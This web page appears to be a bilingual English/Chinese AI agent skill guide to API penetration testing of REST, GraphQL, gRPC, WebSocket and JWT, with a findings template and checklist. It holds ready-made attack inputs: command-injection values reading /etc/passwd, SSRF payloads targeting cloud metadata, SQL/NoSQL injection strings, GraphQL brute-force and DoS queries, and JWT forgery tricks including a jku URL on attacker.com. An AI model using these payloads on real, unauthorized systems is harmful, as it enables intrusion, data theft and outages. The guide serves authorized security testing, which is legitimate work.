Back to Details

api-security

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

API Security Testing

API安全测试

This skill enables comprehensive security testing of APIs including REST, GraphQL, gRPC, and WebSocket protocols. It covers the OWASP API Security Top 10 and provides practical testing methodologies for common API vulnerabilities.
该技能可对REST、GraphQL、gRPC和WebSocket等协议的API进行全面安全测试,覆盖OWASP API安全Top 10漏洞,提供常见API漏洞的实用测试方法。

When to Use This Skill

何时使用该技能

This skill should be invoked when:
  • Performing API penetration testing
  • Testing for OWASP API Security Top 10 vulnerabilities
  • Fuzzing REST/GraphQL/gRPC endpoints
  • Testing API authentication and authorization (BOLA/BFLA)
  • Analyzing OpenAPI/Swagger specifications
  • Testing JWT/OAuth implementations
  • Rate limiting and resource exhaustion testing
出现以下场景时可调用该技能:
  • 执行API渗透测试
  • 检测OWASP API安全Top 10漏洞
  • 对REST/GraphQL/gRPC端点进行模糊测试
  • 测试API身份验证与授权(BOLA/BFLA)
  • 分析OpenAPI/Swagger规范
  • 测试JWT/OAuth实现
  • 速率限制与资源耗尽测试

Trigger Phrases

触发短语

  • "test this API for security issues"
  • "pentest the REST API"
  • "test GraphQL security"
  • "check for BOLA/IDOR vulnerabilities"
  • "analyze OpenAPI spec for security"
  • "test API authentication"
  • "fuzz API endpoints"
  • "测试这个API的安全问题"
  • "渗透测试REST API"
  • "测试GraphQL安全性"
  • "检查BOLA/IDOR漏洞"
  • "分析OpenAPI规范的安全性"
  • "测试API身份验证"
  • "模糊测试API端点"

Prerequisites

前置条件

Required Tools

所需工具

ToolPurposeInstallation
Burp SuiteHTTP interception/testingPortSwigger download
PostmanAPI testing/automationpostman.com
ffufAPI fuzzing
go install github.com/ffuf/ffuf/v2@latest
nucleiVulnerability scanning
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
jwt_toolJWT analysis
pip install jwt_tool
graphql-copGraphQL scanning
pip install graphql-cop
arjunParameter discovery
pip install arjun
kiterunnerAPI endpoint discoveryGitHub release
工具用途安装方式
Burp SuiteHTTP拦截/测试PortSwigger官网下载
PostmanAPI测试/自动化postman.com
ffufAPI模糊测试
go install github.com/ffuf/ffuf/v2@latest
nuclei漏洞扫描
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
jwt_toolJWT分析
pip install jwt_tool
graphql-copGraphQL扫描
pip install graphql-cop
arjun参数发现
pip install arjun
kiterunnerAPI端点发现GitHub Release下载

OWASP API Security Top 10 (2023)

OWASP API安全Top 10(2023)

Priority Testing Matrix

优先级测试矩阵

RankVulnerabilityImpactDetection
API1Broken Object Level Authorization (BOLA)CriticalManual + Automated
API2Broken AuthenticationCriticalManual + Tools
API3Broken Object Property Level AuthorizationHighManual
API4Unrestricted Resource ConsumptionHighAutomated
API5Broken Function Level Authorization (BFLA)HighManual
API6Unrestricted Access to Sensitive Business FlowsHighManual
API7Server Side Request Forgery (SSRF)HighManual + Automated
API8Security MisconfigurationMediumAutomated
API9Improper Inventory ManagementMediumDiscovery
API10Unsafe Consumption of APIsMediumCode Review
排名漏洞影响检测方式
API1broken object level authorization (BOLA)严重手动+自动化
API2broken authentication严重手动+工具
API3broken object property level authorization手动
API4unrestricted resource consumption自动化
API5broken function level authorization (BFLA)手动
API6unrestricted access to sensitive business flows手动
API7server side request forgery (SSRF)手动+自动化
API8security misconfiguration自动化
API9improper inventory management资产发现
API10unsafe consumption of APIs代码审查

REST API Testing

REST API测试

Phase 1: Reconnaissance

阶段1:侦查

bash
undefined
bash
undefined

Discover API endpoints from documentation

Discover API endpoints from documentation

curl -s https://target.com/api/docs | jq curl -s https://target.com/swagger.json curl -s https://target.com/openapi.json curl -s https://target.com/.well-known/openapi.json
curl -s https://target.com/api/docs | jq curl -s https://target.com/swagger.json curl -s https://target.com/openapi.json curl -s https://target.com/.well-known/openapi.json

Fuzz for common API paths

Fuzz for common API paths

ffuf -u https://target.com/FUZZ -w /path/to/api-wordlist.txt -mc 200,201,204,301,302,401,403
ffuf -u https://target.com/FUZZ -w /path/to/api-wordlist.txt -mc 200,201,204,301,302,401,403

Common API paths to check

Common API paths to check

/api/ /api/v1/ /api/v2/ /rest/ /graphql /graphiql /api-docs /swagger /swagger-ui /swagger.json /openapi.json /.well-known/
/api/ /api/v1/ /api/v2/ /rest/ /graphql /graphiql /api-docs /swagger /swagger-ui /swagger.json /openapi.json /.well-known/

Discover parameters

Discover parameters

arjun -u https://target.com/api/users -m GET POST
undefined
arjun -u https://target.com/api/users -m GET POST
undefined

Phase 2: Authentication Testing

阶段2:身份验证测试

bash
undefined
bash
undefined

JWT Analysis

JWT Analysis

jwt_tool <token> -T # Tampering tests jwt_tool <token> -X a # Algorithm none attack jwt_tool <token> -X k # Key confusion RS256->HS256 jwt_tool <token> -C -d /path/to/wordlist # Crack weak secret
jwt_tool <token> -T # Tampering tests jwt_tool <token> -X a # Algorithm none attack jwt_tool <token> -X k # Key confusion RS256->HS256 jwt_tool <token> -C -d /path/to/wordlist # Crack weak secret

OAuth Testing

OAuth Testing

1. Check for open redirect in redirect_uri

1. Check for open redirect in redirect_uri

2. Test state parameter validation

2. Test state parameter validation

3. Test PKCE enforcement

3. Test PKCE enforcement

4. Check token leakage in referrer

4. Check token leakage in referrer

API Key Testing

API Key Testing

1. Check if key in URL (leaks in logs)

1. Check if key in URL (leaks in logs)

2. Test key rotation

2. Test key rotation

3. Check key scoping

3. Check key scoping

4. Test revoked key handling

4. Test revoked key handling

undefined
undefined

Phase 3: Authorization Testing (BOLA/BFLA)

阶段3:授权测试(BOLA/BFLA)

markdown
undefined
markdown
undefined

BOLA (Broken Object Level Authorization) Testing

BOLA (Broken Object Level Authorization) Testing

  1. Identify endpoints with object IDs: GET /api/users/{id} GET /api/orders/{id} PUT /api/documents/{id}
  2. Create two test accounts (User A, User B)
  3. As User A, access own resource: GET /api/users/123 -> 200 OK
  4. As User A, try accessing User B's resource: GET /api/users/456 -> Should be 403, not 200
  5. Test ID types:
    • Sequential integers: 1, 2, 3...
    • UUIDs: May seem random but test anyway
    • Encoded IDs: Base64, hex
    • Timestamps: Predictable patterns
  1. Identify endpoints with object IDs: GET /api/users/{id} GET /api/orders/{id} PUT /api/documents/{id}
  2. Create two test accounts (User A, User B)
  3. As User A, access own resource: GET /api/users/123 -> 200 OK
  4. As User A, try accessing User B's resource: GET /api/users/456 -> Should be 403, not 200
  5. Test ID types:
    • Sequential integers: 1, 2, 3...
    • UUIDs: May seem random but test anyway
    • Encoded IDs: Base64, hex
    • Timestamps: Predictable patterns

BFLA (Broken Function Level Authorization) Testing

BFLA (Broken Function Level Authorization) Testing

  1. Identify privileged endpoints: POST /api/admin/users DELETE /api/admin/config PUT /api/settings/global
  2. As regular user, attempt admin actions
  3. Test HTTP method switching: GET /api/users (allowed) -> POST /api/users (should check auth)
  4. Test parameter pollution: GET /api/users?role=user -> GET /api/users?role=admin
undefined
  1. Identify privileged endpoints: POST /api/admin/users DELETE /api/admin/config PUT /api/settings/global
  2. As regular user, attempt admin actions
  3. Test HTTP method switching: GET /api/users (allowed) -> POST /api/users (should check auth)
  4. Test parameter pollution: GET /api/users?role=user -> GET /api/users?role=admin
undefined

Phase 4: Input Validation Testing

阶段4:输入验证测试

bash
undefined
bash
undefined

SQL Injection

SQL Injection

sqlmap -u "https://target.com/api/users?id=1" --batch --dbs sqlmap -r request.txt --batch --level 5 --risk 3
sqlmap -u "https://target.com/api/users?id=1" --batch --dbs sqlmap -r request.txt --batch --level 5 --risk 3

NoSQL Injection payloads

NoSQL Injection payloads

{"username": {"$ne": ""}, "password": {"$ne": ""}} {"username": {"$gt": ""}, "password": {"$gt": ""}} {"username": {"$regex": "admin.*"}, "password": {"$ne": ""}}
{"username": {"$ne": ""}, "password": {"$ne": ""}} {"username": {"$gt": ""}, "password": {"$gt": ""}} {"username": {"$regex": "admin.*"}, "password": {"$ne": ""}}

Command Injection in API parameters

Command Injection in API parameters

{"cmd": "; ls -la"} {"file": "test.txt; cat /etc/passwd"} {"host": "localhost; whoami"}
{"cmd": "; ls -la"} {"file": "test.txt; cat /etc/passwd"} {"host": "localhost; whoami"}

SSRF payloads

SSRF payloads

{"url": "http://169.254.169.254/latest/meta-data/"} {"webhook": "http://internal-service:8080/admin"} {"avatar": "http://localhost:22"}
undefined
{"url": "http://169.254.169.254/latest/meta-data/"} {"webhook": "http://internal-service:8080/admin"} {"avatar": "http://localhost:22"}
undefined

Phase 5: Rate Limiting & Resource Testing

阶段5:速率限制与资源测试

bash
undefined
bash
undefined

Test rate limiting

Test rate limiting

for i in {1..1000}; do curl -s -o /dev/null -w "%{http_code}\n"
"https://target.com/api/login"
-d '{"user":"test","pass":"test"}' done | sort | uniq -c
for i in {1..1000}; do curl -s -o /dev/null -w "%{http_code}\n"
"https://target.com/api/login"
-d '{"user":"test","pass":"test"}' done | sort | uniq -c

Test pagination abuse

Test pagination abuse

GET /api/users?limit=1000000 GET /api/users?page=-1 GET /api/users?offset=999999999
GET /api/users?limit=1000000 GET /api/users?page=-1 GET /api/users?offset=999999999

Test field expansion

Test field expansion

GET /api/users?expand=all GET /api/users?fields=password,secret
GET /api/users?expand=all GET /api/users?fields=password,secret

Test batch operations

Test batch operations

POST /api/batch [array of 10000 requests]

---
POST /api/batch [array of 10000 requests]

---

GraphQL Security Testing

GraphQL安全测试

Discovery

资产发现

bash
undefined
bash
undefined

Common GraphQL endpoints

Common GraphQL endpoints

/graphql /graphiql /graphql/console /graphql-explorer /v1/graphql
/graphql /graphiql /graphql/console /graphql-explorer /v1/graphql

Introspection query (if enabled)

Introspection query (if enabled)

curl -X POST https://target.com/graphql
-H "Content-Type: application/json"
-d '{"query": "{ __schema { types { name fields { name } } } }"}'
curl -X POST https://target.com/graphql
-H "Content-Type: application/json"
-d '{"query": "{ __schema { types { name fields { name } } } }"}'

Using graphql-cop for scanning

Using graphql-cop for scanning

graphql-cop -t https://target.com/graphql
undefined
graphql-cop -t https://target.com/graphql
undefined

GraphQL-Specific Attacks

GraphQL专属攻击方式

graphql
undefined
graphql
undefined

Introspection Query (full schema)

Introspection Query (full schema)

{ __schema { queryType { name } mutationType { name } types { name fields { name args { name type { name } } type { name } } } } }
{ __schema { queryType { name } mutationType { name } types { name fields { name args { name type { name } } type { name } } } } }

Batching Attack (bypass rate limits)

Batching Attack (bypass rate limits)

[ {"query": "mutation { login(user:"admin", pass:"pass1") { token } }"}, {"query": "mutation { login(user:"admin", pass:"pass2") { token } }"}, {"query": "mutation { login(user:"admin", pass:"pass3") { token } }"} ]
[ {"query": "mutation { login(user:"admin", pass:"pass1") { token } }"}, {"query": "mutation { login(user:"admin", pass:"pass2") { token } }"}, {"query": "mutation { login(user:"admin", pass:"pass3") { token } }"} ]

Alias-based DoS

Alias-based DoS

{ a1: users { id name } a2: users { id name } a3: users { id name }

... repeat many times

}
{ a1: users { id name } a2: users { id name } a3: users { id name }

... repeat many times

}

Deep Query DoS

Deep Query DoS

{ users { friends { friends { friends { friends { name } } } } } }
{ users { friends { friends { friends { friends { name } } } } } }

Directive Overloading

Directive Overloading

query @skip(if: false) @skip(if: false) @skip(if: false) { users { id } }
query @skip(if: false) @skip(if: false) @skip(if: false) { users { id } }

Field Suggestion Exploit

Field Suggestion Exploit

{ user { passwor # Typo may reveal field exists via suggestions } }
undefined
{ user { passwor # Typo may reveal field exists via suggestions } }
undefined

BOLA in GraphQL

GraphQL中的BOLA测试

graphql
undefined
graphql
undefined

Test object-level authorization

Test object-level authorization

query { user(id: "other-user-id") { email ssn creditCard } }
query { user(id: "other-user-id") { email ssn creditCard } }

Nested BOLA

Nested BOLA

query { organization(id: "my-org") { users { # Can I see users from other orgs? id email } } }
query { organization(id: "my-org") { users { # Can I see users from other orgs? id email } } }

Mutation BOLA

Mutation BOLA

mutation { updateUser(id: "other-user-id", input: { role: "admin" }) { id role } }

---
mutation { updateUser(id: "other-user-id", input: { role: "admin" }) { id role } }

---

gRPC Security Testing

gRPC安全测试

Setup

环境配置

bash
undefined
bash
undefined

Install grpcurl

Install grpcurl

go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest
go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest

List services (requires reflection)

List services (requires reflection)

grpcurl -plaintext localhost:50051 list
grpcurl -plaintext localhost:50051 list

Describe service

Describe service

grpcurl -plaintext localhost:50051 describe UserService
grpcurl -plaintext localhost:50051 describe UserService

Call method

Call method

grpcurl -plaintext -d '{"id": "123"}' localhost:50051 UserService/GetUser
undefined
grpcurl -plaintext -d '{"id": "123"}' localhost:50051 UserService/GetUser
undefined

gRPC Testing Areas

gRPC测试要点

markdown
1. **Authentication**
   - Test metadata/header authentication
   - Check certificate validation (mTLS)
   - Test token handling

2. **Authorization**
   - BOLA on resource IDs
   - Method-level access control
   - Role-based restrictions

3. **Input Validation**
   - Protobuf field validation
   - Type confusion
   - Large message DoS

4. **Reflection**
   - Disable in production
   - Information disclosure via describe

5. **TLS Configuration**
   - Verify TLS is enforced
   - Check certificate pinning
   - Test cipher suites
markdown
1. **身份验证**
   - 测试元数据/请求头身份验证
   - 检查证书验证(mTLS)
   - 测试令牌处理逻辑

2. **授权**
   - 资源ID的BOLA漏洞测试
   - 方法级访问控制测试
   - 基于角色的权限限制测试

3. **输入验证**
   - Protobuf字段验证测试
   - 类型混淆漏洞测试
   - 大消息DoS测试

4. **反射功能**
   - 生产环境需关闭反射
   - 通过describe接口的信息泄露测试

5. **TLS配置**
   - 验证TLS强制启用
   - 检查证书固定配置
   - 测试加密套件安全性

WebSocket Security Testing

WebSocket安全测试

Discovery & Connection

发现与连接

javascript
// Connect to WebSocket
const ws = new WebSocket('wss://target.com/ws');

ws.onopen = () => {
  console.log('Connected');
  ws.send(JSON.stringify({action: 'subscribe', channel: 'updates'}));
};

ws.onmessage = (event) => {
  console.log('Received:', event.data);
};
javascript
// Connect to WebSocket
const ws = new WebSocket('wss://target.com/ws');

ws.onopen = () => {
  console.log('Connected');
  ws.send(JSON.stringify({action: 'subscribe', channel: 'updates'}));
};

ws.onmessage = (event) => {
  console.log('Received:', event.data);
};

WebSocket Attacks

WebSocket攻击方式

markdown
1. **Cross-Site WebSocket Hijacking (CSWSH)**
   - Check Origin header validation
   - Test from different domains

2. **Authorization**
   - Subscribe to unauthorized channels
   - Send actions without auth
   - Test BOLA on message IDs

3. **Injection**
   - SQL injection in messages
   - XSS in reflected content
   - Command injection

4. **DoS**
   - Message flooding
   - Large message size
   - Connection exhaustion
markdown
1. **跨站WebSocket劫持(CSWSH)**
   - 检查Origin头验证逻辑
   - 从不同域名发起连接测试

2. **授权测试**
   - 订阅未授权频道测试
   - 未携带认证信息发送操作请求测试
   - 消息ID的BOLA漏洞测试

3. **注入测试**
   - 消息中的SQL注入测试
   - 反射内容中的XSS测试
   - 命令注入测试

4. **DoS测试**
   - 消息泛洪测试
   - 超大消息体积测试
   - 连接耗尽测试

JWT Security Testing

JWT安全测试

Common JWT Attacks

常见JWT攻击方式

bash
undefined
bash
undefined

Decode JWT

Decode JWT

echo "$JWT" | cut -d'.' -f2 | base64 -d 2>/dev/null | jq
echo "$JWT" | cut -d'.' -f2 | base64 -d 2>/dev/null | jq

Algorithm None Attack

Algorithm None Attack

Change header to: {"alg": "none", "typ": "JWT"}

Change header to: {"alg": "none", "typ": "JWT"}

Remove signature

Remove signature

Key Confusion (RS256 to HS256)

Key Confusion (RS256 to HS256)

If server uses RS256, try signing with HS256 using public key

If server uses RS256, try signing with HS256 using public key

Weak Secret Cracking

Weak Secret Cracking

jwt_tool $JWT -C -d /path/to/wordlist.txt hashcat -a 0 -m 16500 jwt.txt wordlist.txt
jwt_tool $JWT -C -d /path/to/wordlist.txt hashcat -a 0 -m 16500 jwt.txt wordlist.txt

Kid Header Injection

Kid Header Injection

{"alg": "HS256", "typ": "JWT", "kid": "../../dev/null"} {"alg": "HS256", "typ": "JWT", "kid": "key' UNION SELECT 'secret'--"}
{"alg": "HS256", "typ": "JWT", "kid": "../../dev/null"} {"alg": "HS256", "typ": "JWT", "kid": "key' UNION SELECT 'secret'--"}

JKU/X5U Header Injection

JKU/X5U Header Injection

{"alg": "RS256", "jku": "https://attacker.com/jwks.json"}
{"alg": "RS256", "jku": "https://attacker.com/jwks.json"}

Host malicious JWKS with your keys

Host malicious JWKS with your keys

Expiration Bypass

Expiration Bypass

Modify exp claim to future date

Modify exp claim to future date

Test with expired tokens

Test with expired tokens

undefined
undefined

JWT Checklist

JWT检查清单

markdown
- [ ] Algorithm none vulnerability
- [ ] Key confusion (RS256 -> HS256)
- [ ] Weak HMAC secret
- [ ] Kid header injection (SQLi, path traversal)
- [ ] JKU/X5U URL injection
- [ ] Token expiration not validated
- [ ] Token not invalidated on logout
- [ ] Sensitive data in payload
- [ ] Token reuse after password change
markdown
- [ ] Algorithm none漏洞
- [ ] 密钥混淆(RS256 -> HS256)
- [ ] 弱HMAC密钥
- [ ] Kid头注入(SQL注入、路径遍历)
- [ ] JKU/X5U URL注入
- [ ] 令牌过期时间未校验
- [ ] 登出后令牌未失效
- [ ]  payload中包含敏感数据
- [ ] 密码修改后令牌仍可复用

API Fuzzing

API模糊测试

Parameter Fuzzing

参数模糊测试

bash
undefined
bash
undefined

Fuzz parameter values

Fuzz parameter values

ffuf -u "https://target.com/api/users?id=FUZZ"
-w numbers.txt
-H "Authorization: Bearer $TOKEN"
-mc 200
ffuf -u "https://target.com/api/users?id=FUZZ"
-w numbers.txt
-H "Authorization: Bearer $TOKEN"
-mc 200

Fuzz JSON body

Fuzz JSON body

ffuf -u "https://target.com/api/users"
-X POST
-H "Content-Type: application/json"
-d '{"role": "FUZZ"}'
-w roles.txt
ffuf -u "https://target.com/api/users"
-X POST
-H "Content-Type: application/json"
-d '{"role": "FUZZ"}'
-w roles.txt

Parameter pollution

Parameter pollution

GET /api/users?id=1&id=2&id=admin
GET /api/users?id=1&id=2&id=admin

Mass assignment

Mass assignment

POST /api/users {"name": "test", "role": "admin", "isAdmin": true}
undefined
POST /api/users {"name": "test", "role": "admin", "isAdmin": true}
undefined

Endpoint Fuzzing

端点模糊测试

bash
undefined
bash
undefined

API endpoint discovery

API endpoint discovery

ffuf -u "https://target.com/api/FUZZ"
-w api-endpoints.txt
-mc 200,201,204,301,302,401,403
ffuf -u "https://target.com/api/FUZZ"
-w api-endpoints.txt
-mc 200,201,204,301,302,401,403

Version fuzzing

Version fuzzing

ffuf -u "https://target.com/api/FUZZ/users"
-w versions.txt # v1, v2, v3, beta, internal
ffuf -u "https://target.com/api/FUZZ/users"
-w versions.txt # v1, v2, v3, beta, internal

HTTP method fuzzing

HTTP method fuzzing

for method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE; do curl -X $method https://target.com/api/admin -v done

---
for method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE; do curl -X $method https://target.com/api/admin -v done

---

Nuclei API Templates

Nuclei API模板

bash
undefined
bash
undefined

Scan with API-specific templates

Scan with API-specific templates

nuclei -u https://target.com/api -t exposures/ nuclei -u https://target.com/api -t vulnerabilities/ nuclei -u https://target.com/api -t misconfiguration/
nuclei -u https://target.com/api -t exposures/ nuclei -u https://target.com/api -t vulnerabilities/ nuclei -u https://target.com/api -t misconfiguration/

Scan from OpenAPI spec

Scan from OpenAPI spec

nuclei -l endpoints.txt -t api-tests/
nuclei -l endpoints.txt -t api-tests/

Custom API template

Custom API template

echo 'id: custom-api-test info: name: Custom API Test severity: high requests:
  • method: GET path:
    • "{{BaseURL}}/api/admin" matchers:
    • type: status status:
      • 200' > custom.yaml
nuclei -u https://target.com -t custom.yaml

---
echo 'id: custom-api-test info: name: Custom API Test severity: high requests:
  • method: GET path:
    • "{{BaseURL}}/api/admin" matchers:
    • type: status status:
      • 200' > custom.yaml
nuclei -u https://target.com -t custom.yaml

---

Common Findings Template

通用漏洞报告模板

BOLA Finding

BOLA漏洞报告

markdown
undefined
markdown
undefined

[CRITICAL] Broken Object Level Authorization (BOLA)

[CRITICAL] Broken Object Level Authorization (BOLA)

Endpoint: GET /api/v1/users/{id} OWASP API: API1:2023
Endpoint: GET /api/v1/users/{id} OWASP API: API1:2023

Description

描述

The API endpoint allows authenticated users to access other users' data by manipulating the ID parameter without proper authorization checks.
该API端点未做适当的授权校验,已认证用户可通过修改ID参数访问其他用户的数据。

Evidence

证据

Request as User A (ID: 123):
GET /api/v1/users/456 HTTP/1.1
Authorization: Bearer <user_a_token>
Response:
json
{
  "id": 456,
  "email": "userb@example.com",
  "ssn": "XXX-XX-XXXX"
}
用户A(ID: 123)发起的请求:
GET /api/v1/users/456 HTTP/1.1
Authorization: Bearer <user_a_token>
响应内容:
json
{
  "id": 456,
  "email": "userb@example.com",
  "ssn": "XXX-XX-XXXX"
}

Impact

影响

  • Access to all user data
  • Privacy violation
  • Potential for data theft
  • 所有用户数据泄露
  • 违反隐私合规要求
  • 存在数据被盗的风险

Remediation

修复方案

  • Implement object-level authorization checks
  • Verify requesting user owns or has access to requested resource
  • Use indirect references or verify ownership
  • 实现对象级授权校验
  • 验证请求用户是否拥有请求资源的访问权限
  • 使用间接引用或所有权校验机制

References

参考链接


---

---

Reporting Checklist

报告检查清单

markdown
undefined
markdown
undefined

API Security Assessment Checklist

API安全评估检查清单

Authentication
  • Authentication mechanism identified
  • Token/session security tested
  • Brute force protection tested
  • Password policies verified
Authorization
  • BOLA tested on all endpoints with IDs
  • BFLA tested (privilege escalation)
  • Role-based access verified
  • Horizontal privilege escalation tested
Input Validation
  • SQL injection tested
  • NoSQL injection tested
  • Command injection tested
  • XXE tested (if XML accepted)
  • SSRF tested on URL parameters
Rate Limiting
  • Rate limiting present
  • Bypass techniques tested
  • Resource exhaustion tested
Information Disclosure
  • Verbose errors disabled
  • Stack traces hidden
  • Internal IPs not leaked
  • API versioning secure
Configuration
  • HTTPS enforced
  • CORS properly configured
  • Security headers present
  • Debug endpoints disabled

---
身份验证
  • 已识别身份验证机制
  • 已测试令牌/会话安全性
  • 已测试暴力破解防护机制
  • 已验证密码策略
授权
  • 所有带ID的端点都已完成BOLA测试
  • 已完成BFLA测试(权限提升)
  • 已验证基于角色的访问控制
  • 已完成水平权限提升测试
输入验证
  • 已测试SQL注入
  • 已测试NoSQL注入
  • 已测试命令注入
  • 已测试XXE(如果支持XML)
  • 已测试URL参数的SSRF漏洞
速率限制
  • 已确认速率限制生效
  • 已测试绕过速率限制的技术
  • 已测试资源耗尽漏洞
信息泄露
  • 已禁用详细错误提示
  • 已隐藏栈跟踪信息
  • 未泄露内部IP地址
  • API版本控制安全
配置
  • 已强制启用HTTPS
  • CORS配置正确
  • 已配置安全头
  • 已禁用调试端点

---

Bundled Resources

附带资源

scripts/

scripts/

  • bola_scanner.py
    - Automated BOLA testing
  • jwt_analyzer.py
    - JWT security analysis
  • graphql_introspection.py
    - GraphQL schema extraction
  • api_fuzzer.py
    - Parameter and endpoint fuzzing
  • openapi_parser.py
    - OpenAPI spec security analysis
  • rate_limit_tester.py
    - Rate limiting bypass testing
  • bola_scanner.py
    - 自动化BOLA测试工具
  • jwt_analyzer.py
    - JWT安全分析工具
  • graphql_introspection.py
    - GraphQL schema提取工具
  • api_fuzzer.py
    - 参数与端点模糊测试工具
  • openapi_parser.py
    - OpenAPI规范安全分析工具
  • rate_limit_tester.py
    - 速率限制绕过测试工具

references/

references/

  • owasp_api_top10.md
    - OWASP API Security Top 10 details
  • jwt_attacks.md
    - Comprehensive JWT attack guide
  • graphql_security.md
    - GraphQL security testing guide
  • rest_testing.md
    - REST API testing methodology
  • owasp_api_top10.md
    - OWASP API安全Top 10详情
  • jwt_attacks.md
    - JWT攻击全指南
  • graphql_security.md
    - GraphQL安全测试指南
  • rest_testing.md
    - REST API测试方法论

payloads/

payloads/

  • sqli_api.txt
    - SQL injection payloads for APIs
  • nosql_injection.txt
    - NoSQL injection payloads
  • ssrf_payloads.txt
    - SSRF test URLs
  • bola_ids.txt
    - Common ID patterns for BOLA testing
  • sqli_api.txt
    - API场景SQL注入payload
  • nosql_injection.txt
    - NoSQL注入payload
  • ssrf_payloads.txt
    - SSRF测试URL
  • bola_ids.txt
    - BOLA测试常用ID模式